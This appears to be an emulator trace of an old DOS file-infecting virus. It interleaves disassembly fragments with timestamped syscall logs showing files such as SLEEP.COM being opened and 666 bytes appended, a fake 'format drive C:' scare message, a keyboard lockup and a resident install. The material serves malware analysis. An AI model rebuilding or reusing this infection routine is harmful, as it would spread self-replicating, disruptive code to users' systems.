0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-25T12:00:32.390866902Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:00:32.407070335Z 66 PC: 12eee | Move file pointer
2018-12-25T12:00:32.408750485Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:00:32.416009701Z 87 PC: 12f25 | Get or set file date and time
2018-12-25T12:00:32.418159353Z 62 PC: 12f2b | Close file
2018-12-25T12:00:32.428154627Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.431244936Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.433331707Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.440851506Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.448424528Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.450551377Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.45405896Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.46462233Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.466730666Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.480191327Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.483248853Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.49259073Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.497868618Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.499262652Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.50694616Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.514952562Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.516681068Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.519573787Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.531406674Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.533172758Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.541366579Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.54460845Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.554205247Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.557827333Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.560411746Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.568360624Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.576014621Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.577682091Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.581418065Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.591122495Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.593122197Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.601069815Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.60376429Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.612977425Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.616493726Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.617851402Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.625963498Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.634095315Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.63590073Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.638903407Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.649947415Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.652376117Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.660453189Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.662986383Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.67432118Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.677793727Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.679469273Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.687979597Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.695287107Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.697419716Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.701227708Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.712910793Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.71451716Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.722757435Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.724583726Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.733426429Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.736872319Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.738160888Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.746665172Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.754317195Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.755880619Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.758360491Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.768250473Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.769806903Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.777617266Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.781028192Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.790442168Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.793247773Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.799144036Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.806770102Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.81123237Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.814100665Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.821882131Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.824388941Z 78 PC: 12fbf | Find first file
2018-12-25T12:00:32.830712709Z 78 PC: 12fbf | Find first file (See above)
2018-12-25T12:00:32.83729038Z 78 PC: 12f54 | Find first file
2018-12-25T12:00:32.843586261Z 44 PC: 13077 | Get time 0x13077: cmp ch, cl
0x13079: je 0x1307c
0x1307b: ret
0x1307c: cli
0x1307d: mov al, 0xad
0x1307f: out 0x64, al
0x13081: nop
0x13082: sti
0x13083: mov dx, di
0x13085: add dx, 0x21f
0x13089: mov ah, 9
0x1308b: int 0x21
0x1308d: cli
0x1308e: jmp 0x1308e
0x13090: add word ptr [bx], di
0x13092: aas
0x13093: aas
0x13094: aas
0x13095: aas
0x13096: aas
2018-12-25T12:00:32.845984426Z 9 PC: 1308d | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)?y')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":6890,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:00:32.626004438Z 26 PC: 12e56 | Set disk transfer address
2018-12-25T12:00:32.628014958Z 78 PC: 12e69 | Find first file
2018-12-25T12:00:32.633800526Z 47 PC: 12e6f | Get disk transfer address
2018-12-25T12:00:32.634924004Z 61 PC: 12ea8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:00:32.641632793Z 63 PC: 12eba | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:00:32.647830534Z 66 PC: 12edd | Move file pointer
2018-12-25T12:00:32.649082463Z 44 PC: 12e20 | Get time 0x12e20: xor cx, dx
0x12e22: xor ch, cl
0x12e24: mov byte ptr [di + 0x10], ch
0x12e27: call 0x22e00
0x12e2a: pop bx
0x12e2b: popaw
0x12e2c: mov ah, byte ptr [di + 9]
0x12e2f: mov cx, 0x29a
0x12e32: nop
0x12e33: mov dx, di
0x12e35: int 0x21
0x12e37: pushaw
0x12e38: call 0x22e00
0x12e3b: pop bx
0x12e3c: popaw
0x12e3d: ret
0x12e3e: xchg di, si
0x12e40: pop si
0x12e41: sub si, 6
0x12e44: push si
2018-12-25T12:00:32.652307702Z 64 PC: 12e37 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:00:32.668205629Z 66 PC: 12eee | Move file pointer
2018-12-25T12:00:32.669513822Z 64 PC: 12f10 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:00:32.676709458Z 87 PC: 12f25 | Get or set file date and time
2018-12-25T12:00:32.678319139Z 62 PC: 12f2b | Close file
2018-12-25T12:00:32.685823263Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.689387156Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.690496605Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.696689883Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.703528538Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.705169255Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.707597899Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.715988027Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.717732525Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.723993561Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.725393189Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.73305092Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.735488709Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.736452001Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.743815767Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.749895432Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.751142951Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.754024965Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.759283969Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.775828695Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.782728692Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.784116104Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.791680831Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.794633249Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.795731779Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.801909787Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.818617933Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.820056696Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.822324975Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.831998865Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.833699878Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.840613339Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.843311235Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.850942245Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.853531117Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.85512057Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.861528832Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.867682599Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.869611442Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.872191263Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.880355491Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.883040498Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.889571414Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.891856637Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.900386904Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.903649561Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.904695911Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.911866335Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.918661264Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.920059191Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.923091575Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.932884682Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.934334979Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.938718345Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.939870481Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.944775392Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.946810957Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.94773725Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:32.951642357Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:32.955839675Z 66 PC: 12edd | Move file pointer (See above)
2018-12-25T12:00:32.957182978Z 44 PC: 12e20 | Get time (See above)
2018-12-25T12:00:32.959400931Z 64 PC: 12e37 | Write file or device (See above)
2018-12-25T12:00:32.968353433Z 66 PC: 12eee | Move file pointer (See above)
2018-12-25T12:00:32.969946515Z 64 PC: 12f10 | Write file or device (See above)
2018-12-25T12:00:32.98243469Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:32.984123516Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:32.991675419Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:32.99395814Z 47 PC: 12e6f | Get disk transfer address (See above)
2018-12-25T12:00:32.995643827Z 61 PC: 12ea8 | Open file (See above)
2018-12-25T12:00:33.001848955Z 63 PC: 12eba | Read file or device (See above)
2018-12-25T12:00:33.004282257Z 87 PC: 12f25 | Get or set file date and time (See above)
2018-12-25T12:00:33.005788774Z 62 PC: 12f2b | Close file (See above)
2018-12-25T12:00:33.013070017Z 79 PC: 12e69 | Find next file (See above)
2018-12-25T12:00:33.015550963Z 78 PC: 12fbf | Find first file
2018-12-25T12:00:33.021702326Z 78 PC: 12fbf | Find first file (See above)
2018-12-25T12:00:33.033110939Z 78 PC: 12f54 | Find first file
2018-12-25T12:00:33.039789067Z 44 PC: 13077 | Get time 0x13077: cmp ch, cl
0x13079: je 0x1307c
0x1307b: ret
0x1307c: cli
0x1307d: mov al, 0xad
0x1307f: out 0x64, al
0x13081: nop
0x13082: sti
0x13083: mov dx, di
0x13085: add dx, 0x21f
0x13089: mov ah, 9
0x1308b: int 0x21
0x1308d: cli
0x1308e: jmp 0x1308e
0x13090: add word ptr [bx], di
0x13092: aas
0x13093: aas
0x13094: aas
0x13095: aas
0x13096: aas
2018-12-25T12:00:33.041268425Z 26 PC: 12e88 | Set disk transfer address
2018-12-25T12:00:33.042693812Z 9 PC: 12d82 | Display string (String= '��p���� ��� - ��p��殢 ����᫠� Press and -- ')
2018-12-25T12:00:33.168092595Z 49 PC: 12df6 | Terminate and stay resident (Return code = '0' | Memory size = '68')